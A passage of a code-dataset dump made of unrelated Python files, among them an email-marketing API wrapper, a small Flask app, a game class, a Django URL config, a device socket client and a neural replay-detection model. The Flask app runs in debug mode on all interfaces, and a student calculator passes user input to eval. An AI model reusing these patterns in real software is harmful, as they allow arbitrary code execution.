get_scoring_in_address_book(cls, address_book, select, skip):\n \"\"\"\n Gets contact scoring for contacts within a specific address \n book or segment\n\n :param address_book:\n :param select: \n :param skip: \n :return: \n \"\"\"\n response = connection.get(\n '/v2/address-books/{}/contacts/score/'.format(address_book.id),\n query_params={\n 'Select': select, 'Skip': skip\n }\n )\n return [ContactScore(**entry) for entry in response]\n\n @classmethod\n def get_all_scoring_in_address_book(cls, address_book):\n all_scoring = []\n select = 1000\n skip = 0\n scorings = cls.get_scoring_in_address_book(address_book, select, skip)\n num_of_entries = len(scorings)\n while num_of_entries > 0:\n all_scoring.extend(scorings)\n if num_of_entries < select:\n break\n skip += select\n scorings = cls.get_scoring_in_address_book(\n address_book, select, skip\n )\n num_of_entries = len(scorings)\n return all_scoring\n\n @classmethod\n def get_scores_modified_since(cls, date, select, skip):\n response = connection.get(\n '{}/score/modified-since/{}'.format(\n cls.end_point, date.strftime('%Y-%m-%d')\n ),\n query_params={\n 'Select': select, 'Skip': skip\n }\n )\n return [ContactScore(**entry) for entry in response]\n\n @classmethod\n def get_all_scores_modified_since(cls, date):\n all_scoring = []\n select = 1000\n skip = 0\n scorings = cls.get_scores_modified_since(date, select, skip)\n num_of_entries = len(scorings)\n while num_of_entries > 0:\n all_scoring.extend(scorings)\n if num_of_entries < select:\n break\n skip += select\n scorings = cls.get_scores_modified_since(date, select, skip)\n num_of_entries = len(scorings)\n return all_scoring\n\n @classmethod\n def get_score_by_email(cls, email):\n \"\"\"\n Gets contact scoring for a contact by email address\n\n :param email: \n :return: \n \"\"\"\n response = connection.get(\n '{}/{}/score'.format(cls.end_point, email)\n )\n return ContactScore(**response)\n\n @classmethod\n def get_score_by_id(cls, id):\n \"\"\"\n Gets contact scoring for a contact by ID\n \n :param id: \n :return: \n \"\"\"\n response = connection.get(\n '{}/{}/score'.format(cls.end_point, id)\n )\n return ContactScore(**response)\n","sub_path":"dotmailer/contacts.py","file_name":"contacts.py","file_ext":"py","file_size_in_byte":28411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"584284491","text":"from flask import Flask, request, jsonify,render_template\nfrom flask.logging import create_logger\nimport logging\n\n\napp = Flask(__name__)\nLOG = create_logger(app)\nLOG.setLevel(logging.INFO)\n\n@app.route(\"/\")\ndef home():\n return render_template('index.html')\n\nif __name__ == \"__main__\":\n\n app.run(host='0.0.0.0', port=80, debug=True) \n","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"337587816","text":"from random import *\n\nfrom candy_slayer.monster.Ghoul import Ghoul\nfrom candy_slayer.monster.Person import Person\nfrom candy_slayer.monster.Vampire import Vampire\nfrom candy_slayer.monster.Werewolf import Werewolf\nfrom candy_slayer.monster.Zombie import Zombie\nfrom candy_slayer.observed.Observer import Observer\nfrom candy_slayer.observed.Observable import Observable\n\n\nclass Home(Observer):\n \"\"\"A home filled with monsters.\"\"\"\n def __init__(self, manager):\n \"\"\"\n Initialize monsters inside the house.\n\n :param manager: game manager class\n \"\"\"\n self.observable = Observable()\n self.observable.register(manager)\n self.monsters = [self.numb_to_monster(randint(1, 5)) for i in range(randint(1, 10))]\n\n def get_monsters(self):\n \"\"\"\n Getter for the monsters inside the house.\n\n :return: the list of monsters inside the house.\n \"\"\"\n return self.monsters\n\n def get_population(self):\n \"\"\"\n Give the population of the house.\n\n :return: the integer value of the population of monsters in the house.\n \"\"\"\n self.population = 0\n for monster in self.monsters:\n if monster.get_name() != \"Person\":\n self.population += 1\n return self.population\n\n def update(self):\n \"\"\"Called when a monster dies so that it can turn into a person.\"\"\"\n for i, monster in enumerate(self.monsters):\n if monster.get_hp() < 1:\n self.monsters.pop(i)\n self.monsters.insert(i, Person(self))\n self.observable.update_observers()\n\n def numb_to_monster(self, x):\n \"\"\"\n Link a value to a monster object.\n\n :param x: random integer\n \"\"\"\n monster_val = {\n 1: Person(self),\n 2: Zombie(self),\n 3: Vampire(self),\n 4: Ghoul(self),\n 5: Werewolf(self),\n }\n return monster_val.get(x, Person(self))\n","sub_path":"candy_slayer/Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"304343213","text":"import settings.matrix as matrix\nfrom .productSizeTable import ProductSizeTable\nfrom settings.myError import NoSizeTableError\n\n\nclass ProductSize(ProductSizeTable):\n\n def get_size_info(self, product_id):\n print('Get size from size_table')\n # 그냥 일단 전부 가져와서 2차원배열로 만들자\n\n # 테이블을 전부 찾아논다\n t_heads = self.ch.driver.find_elements_by_xpath(self.xpath_info.t_head_xpath)\n t_bodies = self.ch.driver.find_elements_by_xpath(self.xpath_info.t_body_xpath)\n\n num = len(t_heads)\n if num == 0:\n raise NoSizeTableError\n\n # 첫번째 사이즈표부터 채우고 다시 size_table 을 리셋한다.\n for i in range(num):\n\n # 사이즈표를 채운다\n self.fill_table(t_heads[i], t_bodies[i])\n\n # 테이블을 확인 후 필요하면 전치\n try:\n self.conf_n_trans()\n except IndexError:\n self.fill_err_product('size_error', self.url, product_id, 'Is not matrix')\n finally:\n # 테이블 가공 후에 디비에 저장\n self.cut_n_insert(product_id, i)\n # 사이즈표 리셋 : 다음 사이즈표를 위해서\n del self.size_table[:]\n return\n\n def conf_n_trans(self):\n # 확인 작업 & 전치 필요하면 전치시킨다\n try:\n if not matrix.confirm_matrix(self.size_table):\n pass\n # raise IndexError\n finally:\n if self.xpath_info.need_trans:\n self.size_table = matrix.transpose_matrix(self.size_table)\n return\n\n def cut_n_insert(self, product_id, i):\n # 확인해서 문제가 있어도, 임의처리해서 디비에 넣긴 하자.\n col = ['product_id', 'dsc_idx', 'bulk']\n # DB 에 넣기 위해 column, value 맞춰주기\n self.cut_table(col)\n # DB 에 넣기\n self.insert_2_db(product_id, i + 1, col)\n return\n\n def insert_2_db(self, product_id, idx, col):\n # DB 에 넣기\n for row in self.size_table:\n val = [product_id, idx]\n val.extend(row)\n # print(f'{col}: {val}')\n self.db.insert_sub_data('size_info', col, val)\n return\n","sub_path":"common/product/productSize.py","file_name":"productSize.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"24333797","text":"from django.conf.urls import url,include\nfrom django.contrib import admin\nfrom . import views\nfrom django.shortcuts import redirect\nfrom registration.backends.simple.views import RegistrationView\n\n\n# Create a new class that redirects the user to the index page, if successful at logging\nclass MyRegistrationView(RegistrationView):\n def get_success_url(self, user):\n return '/'\n def form_valid(self, form):\n new_user = self.register(form)\n success_url = self.get_success_url(new_user)\n\n # success_url may be a simple string, or a tuple providing the\n # full argument set for redirect(). Attempting to unpack it\n # tells us which one it is.\n try:\n to, args, kwargs = success_url\n return redirect(to, *args, **kwargs)\n except ValueError:\n return redirect(success_url)\n\nurlpatterns = [\n url(r'^forum/', include('forum.urls')),\n url(r'^admin/', admin.site.urls),\n #Add in this url pattern to override the default pattern in accounts.\n url(r'^accounts/register/$', MyRegistrationView.as_view(), name='registration_register'),\n url(r'^accounts/', include('registration.backends.simple.urls')),\n url(r'^$', views.home, name='home'),\n]\n","sub_path":"qanda/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"132196137","text":"import socket\nimport threading\nimport time\nimport queue\n\nimport communications.cyphersasclient\nimport parsers.clientforger\nimport config\nimport parsers.protocolutil as util\n\nfrom climanifests import cypherdealer as cypherdealer\nfrom climanifests import basic_requirements as basic_mani\nfrom climanifests import chain_process as chain_pro\nfrom climanifests import chain_processor\n\nfrom server_serv import forkliftsockserv as server\nfrom config import actionpool as thread_pool\n\n\nhost = config.serv_conn_host\nport = int(config.serv_conn_port)\n\nport_self = int(config.server_port)\n\nRESP_BUF = 4096\n\n##############################################################################################################\n# this is the only one queue for the device to send any stuff #\n# say in the future when multiple threading works are needed, just start other stuff with new socket threads.#\n##############################################################################################################\nsend_queue = queue.Queue()\n\n# create an ipv4 (AF_INET) socket object using the tcp protocol (SOCK_STREAM)\ncli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nwhile True:\n try:\n cli.connect((host, port))\n break\n except socket.error:\n print('could not connect to server... will continue trying...')\n time.sleep(10)\n pass\n\ncypherClient = communications.cyphersasclient\n\n\nclass Banner:\n\n def __init__(self):\n self.name = config.device_name\n\n def say_stuff(self, stuff):\n self.name = stuff\n\n def see_stuff(self):\n print(self.name)\n\n\nclass Welcome:\n\n def __init__(self, my_name):\n self.name = my_name\n forger = Banner()\n forger.say_stuff('Hello world! This is a truckLift fork. '\n 'Will spread data and fork you guys. And my name is:'\n + self.name)\n forger.see_stuff()\n\n\ndef send_monitor():\n while True:\n next_mess = send_queue.get()\n if next_mess is not None and str(next_mess).strip() != '':\n print('sending::' + str(next_mess))\n try:\n cli.send(bytes(next_mess, 'UTF-8'))\n except Exception as ex:\n print('CUT_OFF={}'.format(ex.__str__()))\n return\n time.sleep(5 / 1000)\n\n\ndef recv_monitor():\n while 1:\n try:\n reply = cli.recv(RESP_BUF)\n if reply is not None and str(reply).strip() != '':\n re = str(reply, 'UTF-8')\n if re.__contains__('you have reached me'):\n print('regular kismet for ' + re)\n else:\n tube = parsers.clientforger.MessageTube(cli, re)\n tube.mess_deal()\n except ConnectionResetError:\n time.sleep(10)\n try:\n cli.connect((host, port))\n except socket.error:\n pass\n\n\ndef main_send():\n loginttl = int(config.loginttl) # the initial login ttl\n while True:\n islogged = util.get_logged(config.publicid)\n if islogged is None:\n islogged = 0\n util.save_logged(config.publicid)\n if islogged == 0:\n send_queue.put(cypherClient.truck_device_auth()) # login\n while util.get_logged(config.publicid) == 0 and loginttl > 0:\n loginttl = loginttl - 1\n time.sleep(1)\n break\n else:\n print('...LOGIN SUCCESSFUL...')\n break\n time.sleep(30)\n util.turn_logged(config.publicid)\n q = cypherClient.cypher_queue\n while True:\n next_mess = q.get()\n if next_mess is not None and str(next_mess).strip() != '':\n send_queue.put(next_mess)\n time.sleep(1 / 500)\n\n\n# action model manifest\ndef manifest_initiator():\n print('initiate manifests')\n basic_requirement_manifest = basic_mani.ManifestSyncBasicInfo(send_queue)\n basic_requirement_manifest.daemon = True\n basic_requirement_manifest.start()\n\n\nif __name__ == '__main__':\n welcome = Welcome(config.device_name)\n receive_main = threading.Thread(name='MainReceiveClient', target=recv_monitor)\n receive_main.daemon = True\n receive_main.start()\n send_main = threading.Thread(name='MainSendClient', target=send_monitor)\n send_main.daemon = True\n send_main.start()\n test_send = threading.Thread(name='MainSend', target=main_send)\n test_send.daemon = True\n test_send.start()\n manifest_thread = threading.Thread(name='manifest_initiator', target=manifest_initiator)\n manifest_thread.setDaemon(True)\n manifest_thread.start()\n chain_thread = chain_pro.ChainProcessThread()\n chain_thread.setDaemon(True)\n chain_thread.start()\n chain_sync_thread = chain_processor.SyncChain()\n chain_sync_thread.setDaemon(True)\n chain_sync_thread.start()\n cypher_dealer = cypherdealer.CypherDealer()\n cypher_dealer.setDaemon(True)\n cypher_dealer.start()\n chain_dealer = cypherdealer.SpecialForChain()\n chain_dealer.setDaemon(True)\n chain_dealer.start()\n midway_tube = thread_pool.MidwayTube(send_queue)\n midway_tube.daemon = True\n midway_tube.start()\n key_chain_gen = util.DailyKeyChainGen()\n key_chain_gen.daemon = True\n key_chain_gen.start()\n chain_calc_thread = cypherdealer.ChainCalculate()\n chain_calc_thread.daemon = True\n chain_calc_thread.start()\n thread_pool.on_pool(server.run_serv, port_self)\n","sub_path":"__main__/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":5510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"296834754","text":"import socket\n\n# 创建一个socket\nserver = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\n# 绑定ip端口\nserver.bind(('127.0.0.1',8888))\n\n# 监听\nserver.listen(5)\n\nprint(\"服务器启动...\")\n\"\"\"\nwhile True:\n # 等待连接\n clientSocket,clientAddr = server.accept()\n # 启动一个线程,将当前连接的socket借给线程\n\"\"\"\n\n# 等待连接\nclientSocket,clientAddr = server.accept()\ntry:\n while True:\n # 接收客户端的数据\n data = clientSocket.recv(1024).decode(\"utf-8\")\n print(\"接收到来自%s的数据:%s\" % (clientAddr,data))\n clientSocket.send((\"接收到来自%s的数据:%s\" % (clientAddr,data)).encode(\"utf-8\"))\nexcept ConnectionResetError:\n print(\"断开连接,客户端关闭连接\")\n","sub_path":"《Python从入门到精通 明日科技》python自学笔记/26,网络编程/TCP编程/2,客户端与服务器交互/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"371470132","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n# Created on 05/06/20 3:55 PM\r\n# @author: Gurusankar G\r\n\r\nimport collections\r\nimport datetime\r\nimport itertools\r\nimport logging\r\nimport time\r\n\r\nimport xmltodict\r\nfrom tqdm import tqdm\r\n\r\n# Necessary imports includes importing Triple optimizer package\r\nimport ta_lib.tpo.optimization.discrete.results_helper as res\r\nfrom ta_lib.core.api import create_context, initialize_environment\r\nfrom ta_lib.core.utils import configure_logger, get_package_path\r\nfrom ta_lib.tpo.optimization.discrete.global_data_init_class import ( # noqa\r\n global_initializer,\r\n)\r\nfrom ta_lib.tpo.optimization.discrete.stage_3_tpo_optimizer import Stage3_caller\r\n\r\n\r\ndef get_pack_path():\r\n \"\"\"Absolute path for the package.\"\"\"\r\n return get_package_path().replace(\"\\\\\", \"/\") + \"/\"\r\n\r\n\r\ndef current_time():\r\n return datetime.datetime.now().strftime(\"%d_%m_%Y_%H_%M_%S\")\r\n\r\n\r\ninitialize_environment(debug=False, hide_warnings=True)\r\nconfig_path = (\r\n get_pack_path() + \"../notebooks/tpo/python/conf/config.yml\"\r\n) # noqa\r\n\r\ncontext = create_context(config_path)\r\n\r\nlogger = logging.getLogger(__name__)\r\nlog_path = get_pack_path() + \"../logs/tpo_optimizer_\" + current_time() + \".log\"\r\nlogger = configure_logger(log_file=log_path, log_level=\"DEBUG\")\r\n\r\n# Inputs for Particular Retailer Category Combination is stored int input.xml\r\n\r\n# Reading and making the relevant information for\r\n# each retailer and category stored in input.xml\r\noptim_config_path = (\r\n get_pack_path()\r\n + \"../notebooks/tpo/python/conf/Discrete_optimizer_config.xml\"\r\n)\r\n\r\nwith open(optim_config_path) as fd: # noqa\r\n doc = xmltodict.parse(fd.read())\r\nhead = doc[\"data\"]\r\nRetailer_Category_Combo = head[\"ret_cat_combo\"]\r\n\r\nif isinstance(Retailer_Category_Combo, collections.OrderedDict):\r\n Retailer_Category_Combo = [Retailer_Category_Combo]\r\n\r\nif __name__ == \"__main__\":\r\n\r\n for single_combo in tqdm(Retailer_Category_Combo):\r\n global Globals\r\n # calling the global initializer for creating a concrete class\r\n # for global data availability across optimizer stages\r\n Globals = global_initializer(single_combo)\r\n check = globals\r\n counter = 0 # track how many combinations converge\r\n combo = [False, True]\r\n z = 0\r\n const_comb = list(itertools.product(combo, repeat=13))[1:]\r\n\r\n for single_comb in const_comb:\r\n\r\n single_comb = [\r\n True,\r\n True,\r\n True,\r\n True,\r\n True,\r\n True,\r\n True,\r\n False,\r\n True,\r\n True,\r\n True,\r\n False,\r\n False,\r\n False,\r\n ]\r\n sec_sing_comb = [\r\n single_comb[0],\r\n single_comb[6],\r\n single_comb[11],\r\n single_comb[12],\r\n ]\r\n\r\n if Globals.class_loader():\r\n\r\n s = time.time()\r\n Stage3_caller(Globals, single_comb, sec_sing_comb)\r\n e = time.time()\r\n if (\r\n Globals.Stage3Success\r\n & Globals.Stage2Success\r\n & Globals.Stage1Success\r\n ):\r\n St1 = Globals.Stage1Success\r\n St2 = Globals.Stage2Success\r\n St3 = Globals.Stage3Success\r\n\r\n if St1 & St2 & St3:\r\n\r\n res.save_results(Globals, runtime=e - s)\r\n break\r\n","sub_path":"caller.py","file_name":"caller.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"512414475","text":"\"\"\" CSC 161 Lab2 Xiaoxuan Wang\r\n This program implements a basic interactive calculator.\r\n\r\nSept 11, 2016\r\n\"\"\"\r\n\r\n\r\ndef main():\r\n n = eval(input(\"How many calculations should I perform?\"))\r\n\r\n for i in range(n):\r\n exp = input(\"Enter a math expression:\")\r\n result = eval(exp)\r\n print(exp, \" = \", result)\r\n\r\n\r\nmain()\r\n","sub_path":"lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"586909261","text":"from functools import partial\nfrom itertools import combinations_with_replacement\nfrom logging import getLogger\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport xarray as xr\nfrom sklearn.base import BaseEstimator\nfrom sklearn.externals import joblib\nfrom sklearn.mixture import BayesianGaussianMixture\nfrom sklearn.neighbors import KernelDensity\nfrom statsmodels.tsa.tsatools import lagmat\n\nfrom .core import (_filter, _smoother, atleast_2d, get_grid,\n get_observed_position_bin, replace_NaN, return_None)\nfrom .lfp_likelihood import fit_lfp_likelihood\nfrom .movement_state_transition import (empirical_movement, random_walk,\n w_track_1D_random_walk)\nfrom .multiunit_likelihood import fit_multiunit_likelihood\nfrom .replay_state_transition import fit_replay_state_transition\nfrom .speed_likelhood import fit_speed_likelihood\nfrom .spiking_likelihood import fit_spiking_likelihood\n\nlogger = getLogger(__name__)\n\n_DEFAULT_LIKELIHOODS = ['spikes', 'lfp_power']\n_DEFAULT_MULTIUNIT_KWARGS = dict(n_components=30, max_iter=200, tol=1E-6)\n_DEFAULT_LFP_KWARGS = dict(n_components=10, max_iter=200, tol=1E-6)\n_DEFAULT_OCCUPANCY_KWARGS = dict(bandwidth=2)\n\n\nclass ReplayDetector(BaseEstimator):\n \"\"\"Find replay events using information from spikes, lfp ripple band power,\n speed, and/or multiunit.\n\n Attributes\n ----------\n speed_threshold : float, optional\n Speed cutoff that denotes when the animal is moving vs. not moving.\n spike_model_penalty : float, optional\n replay_state_transition_penalty : float, optional\n place_bin_size : float, optional\n replay_speed : int, optional\n The amount of speedup expected from the replay events vs.\n normal movement.\n spike_model_knot_spacing : float, optional\n Determines how far apart to place to the spline knots over position.\n speed_knots : ndarray, shape (n_knots,), optional\n Spline knots for lagged speed in replay state transition.\n multiunit_density_model : Class, optional\n Fits the mark space vs. position density. Can be any class with a fit,\n score_samples, and a sample method. For example, density estimators\n from scikit-learn such as sklearn.neighbors.KernelDensity,\n sklearn.mixture.GaussianMixture, and\n sklearn.mixture.BayesianGaussianMixture.\n multiunit_model_kwargs : dict, optional\n Arguments for the `multiunit_density_model`\n\n Methods\n -------\n fit\n Fits the model to the training data.\n predict\n Predicts the replay probability and posterior density to new data.\n plot_fitted_place_fields\n Plot the place fields from the fitted spiking data.\n plot_fitted_multiunit_model\n Plot position by mark from the fitted multiunit data.\n plot_replay_state_transition\n Plot the replay state transition model over speed lags.\n plot_movement_state_transition\n Plot the semi-latent state movement transition model.\n\n \"\"\"\n\n def __init__(self, speed_threshold=4.0, spike_model_penalty=1E-1,\n replay_state_transition_penalty=1E-5,\n place_bin_size=2.0, n_place_bins=None, replay_speed=20,\n movement_std=0.050, spike_model_knot_spacing=15,\n speed_knots=None,\n multiunit_density_model=BayesianGaussianMixture,\n multiunit_model_kwargs=_DEFAULT_MULTIUNIT_KWARGS,\n multiunit_occupancy_model=KernelDensity,\n multiunit_occupancy_kwargs=_DEFAULT_OCCUPANCY_KWARGS,\n lfp_model=BayesianGaussianMixture,\n lfp_model_kwargs=_DEFAULT_LFP_KWARGS,\n movement_state_transition_type='empirical'):\n if n_place_bins is not None and place_bin_size is not None:\n logger.warn('Both place_bin_size and n_place_bins are set. Using'\n ' place_bin_size.')\n self.speed_threshold = speed_threshold\n self.spike_model_penalty = spike_model_penalty\n self.replay_state_transition_penalty = replay_state_transition_penalty\n self.place_bin_size = place_bin_size\n self.n_place_bins = n_place_bins\n self.replay_speed = replay_speed\n self.movement_std = movement_std\n self.spike_model_knot_spacing = spike_model_knot_spacing\n self.speed_knots = speed_knots\n self.multiunit_density_model = multiunit_density_model\n self.multiunit_model_kwargs = multiunit_model_kwargs\n self.multiunit_occupancy_model = multiunit_occupancy_model\n self.multiunit_occupancy_kwargs = multiunit_occupancy_kwargs\n self.lfp_model = lfp_model\n self.lfp_model_kwargs = lfp_model_kwargs\n self.movement_state_transition_type = movement_state_transition_type\n\n def fit(self, is_replay, speed, position, lfp_power=None,\n spikes=None, multiunit=None, is_track_interior=None,\n track_labels=None):\n \"\"\"Train the model on replay and non-replay periods.\n\n Parameters\n ----------\n is_replay : bool ndarray, shape (n_time,)\n speed : ndarray, shape (n_time,)\n position : ndarray, shape (n_time,)\n lfp_power : ndarray or None, shape (n_time, n_signals), optional\n spikes : ndarray or None, shape (n_time, n_neurons), optional\n multiunit : ndarray or None, shape (n_time, n_marks, n_signals), optional\n np.nan represents times with no multiunit activity.\n is_track_interior : ndarray, shape (n_place_bins, n_position_dims)\n track_labels : ndarray or None, shape (n_time,)\n \"\"\"\n speed = np.asarray(speed).squeeze()\n position = atleast_2d(np.asarray(position))\n is_replay = np.asarray(is_replay).squeeze()\n\n (self.edges_, self.place_bin_edges_, self.place_bin_centers_,\n self.centers_shape_) = get_grid(\n position, bin_size=self.place_bin_size)\n\n if is_track_interior is None:\n self.is_track_interior_ = np.ones_like(self.place_bin_centers_,\n dtype=np.bool)\n\n logger.info('Fitting speed model...')\n self._speed_likelihood = fit_speed_likelihood(\n speed, is_replay, self.speed_threshold)\n if lfp_power is not None:\n logger.info('Fitting LFP power model...')\n lfp_power = np.asarray(lfp_power)\n self._lfp_likelihood = fit_lfp_likelihood(\n lfp_power, is_replay, self.lfp_model, self.lfp_model_kwargs)\n else:\n self._lfp_likelihood = return_None\n\n if spikes is not None:\n logger.info('Fitting spiking model...')\n spikes = np.asarray(spikes)\n self._spiking_likelihood = fit_spiking_likelihood(\n position, spikes, is_replay, self.place_bin_centers_,\n self.spike_model_penalty, self.spike_model_knot_spacing)\n else:\n self._spiking_likelihood = return_None\n\n if multiunit is not None:\n logger.info('Fitting multiunit model...')\n multiunit = np.asarray(multiunit)\n self._multiunit_likelihood = fit_multiunit_likelihood(\n position, multiunit, is_replay, self.place_bin_centers_,\n self.multiunit_density_model, self.multiunit_model_kwargs,\n self.multiunit_occupancy_model, self.multiunit_occupancy_kwargs\n )\n else:\n self._multiunit_likelihood = return_None\n\n logger.info('Fitting movement state transition...')\n if self.movement_state_transition_type == 'empirical':\n self.movement_state_transition_ = empirical_movement(\n position, self.edges_, is_training=speed > 4,\n replay_speed=self.replay_speed)\n elif self.movement_state_transition_type == 'random_walk':\n self.movement_state_transition_ = random_walk(\n self.place_bin_centers_, self.movement_std**2,\n is_track_interior=self.is_track_interior_,\n replay_speed=self.replay_speed)\n elif self.movement_state_transition_type == 'w_track_1D_random_walk':\n self.movement_state_transition_ = w_track_1D_random_walk(\n position, self.place_bin_edges_,\n self.place_bin_centers_, track_labels,\n self.movement_std**2, self.replay_speed)\n logger.info('Fitting replay state transition...')\n self.replay_state_transition_ = fit_replay_state_transition(\n speed, is_replay, self.replay_state_transition_penalty,\n self.speed_knots)\n\n return self\n\n def predict(self, speed, position, lfp_power=None, spikes=None,\n multiunit=None, use_likelihoods=_DEFAULT_LIKELIHOODS,\n time=None, use_smoother=True):\n \"\"\"Predict the probability of replay and replay position/position.\n\n Parameters\n ----------\n speed : ndarray, shape (n_time,)\n position : ndarray, shape (n_time,)\n lfp_power : ndarray, shape (n_time, n_signals)\n spikes : ndarray or None, shape (n_time, n_neurons), optional\n multiunit : ndarray or None, shape (n_time, n_marks, n_signals),\n optional\n use_likelihoods : list of str, optional\n Valid strings in the list are:\n (speed | lfp_power | spikes | multiunit)\n time : ndarray or None, shape (n_time,), optional\n Experiment time will be included in the results if specified.\n use_smoother : bool, True\n\n Returns\n -------\n decoding_results : xarray.Dataset\n Includes replay probability and posterior density.\n\n \"\"\"\n n_time = speed.shape[0]\n speed = np.asarray(speed).squeeze()\n position = atleast_2d(np.asarray(position))\n if lfp_power is not None:\n lfp_power = np.asarray(lfp_power)\n if spikes is not None:\n spikes = np.asarray(spikes)\n if multiunit is not None:\n multiunit = np.asarray(multiunit)\n\n if time is None:\n time = np.arange(n_time)\n lagged_speed = lagmat(speed, maxlag=1).squeeze()\n\n place_bins = self.place_bin_centers_\n\n likelihood = np.ones((n_time, 2, 1))\n\n likelihoods = {\n 'speed': partial(self._speed_likelihood, speed=speed,\n lagged_speed=lagged_speed),\n 'lfp_power': partial(self._lfp_likelihood,\n ripple_band_power=lfp_power),\n 'spikes': partial(self._spiking_likelihood,\n is_spike=spikes, position=position),\n 'multiunit': partial(self._multiunit_likelihood,\n multiunit=multiunit, position=position)\n }\n\n for name, likelihood_func in likelihoods.items():\n if name.lower() in use_likelihoods:\n logger.info('Predicting {0} likelihood...'.format(name))\n likelihood = likelihood * replace_NaN(likelihood_func())\n if (name == 'spikes') or (name == 'multiunit'):\n likelihood[:, :, ~self.is_track_interior_.squeeze()] = 0.0\n replay_state_transition = self.replay_state_transition_(lagged_speed)\n observed_position_bin = get_observed_position_bin(\n position, self.place_bin_edges_)\n\n logger.info('Predicting replay probability and density...')\n posterior, state_probability, _ = _filter(\n likelihood, self.movement_state_transition_,\n replay_state_transition, observed_position_bin)\n if use_smoother:\n logger.info('Smoothing...')\n posterior, state_probability, _, _ = _smoother(\n posterior, self.movement_state_transition_,\n replay_state_transition, observed_position_bin)\n if likelihood.shape[-1] > 1:\n likelihood_dims = ['time', 'state', 'position']\n else:\n likelihood_dims = ['time', 'state']\n coords = {'time': time,\n 'position': place_bins.squeeze(),\n 'state': ['No Replay', 'Replay']}\n\n return xr.Dataset(\n {'replay_probability': (['time'], state_probability[:, 1]),\n 'posterior': (['time', 'state', 'position'], posterior),\n 'likelihood': (likelihood_dims, likelihood.squeeze())},\n coords=coords)\n\n def plot_fitted_place_fields(self, sampling_frequency=1, col_wrap=5,\n axes=None):\n \"\"\"Plot the place fields from the fitted spiking data.\n\n Parameters\n ----------\n ax : matplotlib axes or None, optional\n sampling_frequency : float, optional\n\n \"\"\"\n place_conditional_intensity = (\n self._spiking_likelihood\n .keywords['place_conditional_intensity']).squeeze()\n n_neurons = place_conditional_intensity.shape[1]\n n_rows = np.ceil(n_neurons / col_wrap).astype(np.int)\n\n if axes is None:\n fig, axes = plt.subplots(n_rows, col_wrap, sharex=True,\n figsize=(col_wrap * 2, n_rows * 2))\n\n for ind, ax in enumerate(axes.flat):\n if ind < n_neurons:\n ax.plot(self.place_bin_centers_,\n place_conditional_intensity[:, ind] *\n sampling_frequency, color='red', linewidth=3,\n label='fitted model')\n ax.set_title(f'Neuron #{ind + 1}')\n ax.set_ylabel('Spikes / s')\n ax.set_xlabel('Position')\n else:\n ax.axis('off')\n plt.tight_layout()\n\n @staticmethod\n def plot_spikes(spikes, position, is_replay, sampling_frequency=1,\n col_wrap=5, bins='auto'):\n is_replay = np.asarray(is_replay.copy()).squeeze()\n position = np.asarray(position.copy()).squeeze()[~is_replay]\n spikes = np.asarray(spikes.copy())[~is_replay]\n\n position_occupancy, bin_edges = np.histogram(position, bins=bins)\n bin_size = np.diff(bin_edges)[0]\n\n time_ind, neuron_ind = np.nonzero(spikes)\n n_neurons = spikes.shape[1]\n\n n_rows = np.ceil(n_neurons / col_wrap).astype(np.int)\n\n fig, axes = plt.subplots(n_rows, col_wrap, sharex=True,\n figsize=(col_wrap * 2, n_rows * 2))\n\n for ind, ax in enumerate(axes.flat):\n if ind < n_neurons:\n hist, _ = np.histogram(position[time_ind[neuron_ind == ind]],\n bins=bin_edges)\n rate = sampling_frequency * hist / position_occupancy\n ax.bar(bin_edges[:-1], rate, width=bin_size)\n ax.set_title(f'Neuron #{ind + 1}')\n ax.set_ylabel('Spikes / s')\n ax.set_xlabel('Position')\n else:\n ax.axis('off')\n\n plt.tight_layout()\n\n return axes\n\n def plot_fitted_multiunit_model(self, sampling_frequency=1,\n n_samples=10000,\n mark_edges=np.linspace(0, 400, 100),\n is_histogram=False):\n \"\"\"Plot position by mark from the fitted multiunit data.\n\n Parameters\n ----------\n sampling_frequency : float, optional\n If 'is_histogram' is True, then used for computing the intensity.\n n_samples : int, optional\n Number of samples to generate from the fitted model.\n mark_edges : ndarray, shape (n_edges,)\n If `is_histogram` is True, then the edges that define the mark bins\n is_histogram : bool, optional\n If True, plots the joint mark intensity of the samples. Otherwise,\n a scatter plot of the samples is returned.\n\n Returns\n -------\n axes : matplotlib.pyplot axes\n\n \"\"\"\n joint_models = (self._multiunit_likelihood\n .keywords['joint_models'])\n mean_rates = self._multiunit_likelihood.keywords['mean_rates']\n bins = (self.place_bin_edges_.squeeze(), mark_edges)\n if is_histogram:\n place_occupancy = np.exp(\n self._multiunit_likelihood\n .keywords['occupancy_model']\n .score_samples(self.place_bin_centers_))\n n_signals = len(joint_models)\n try:\n n_marks = joint_models[0].sample().shape[1] - 1\n except AttributeError:\n n_marks = joint_models[0].sample()[0].shape[1] - 1\n\n fig, axes = plt.subplots(n_signals, n_marks,\n figsize=(n_marks * 3, n_signals * 3),\n sharex=True, sharey=True)\n zipped = zip(joint_models, mean_rates, axes)\n for electrode_ind, (model, mean_rate, row_axes) in enumerate(zipped):\n 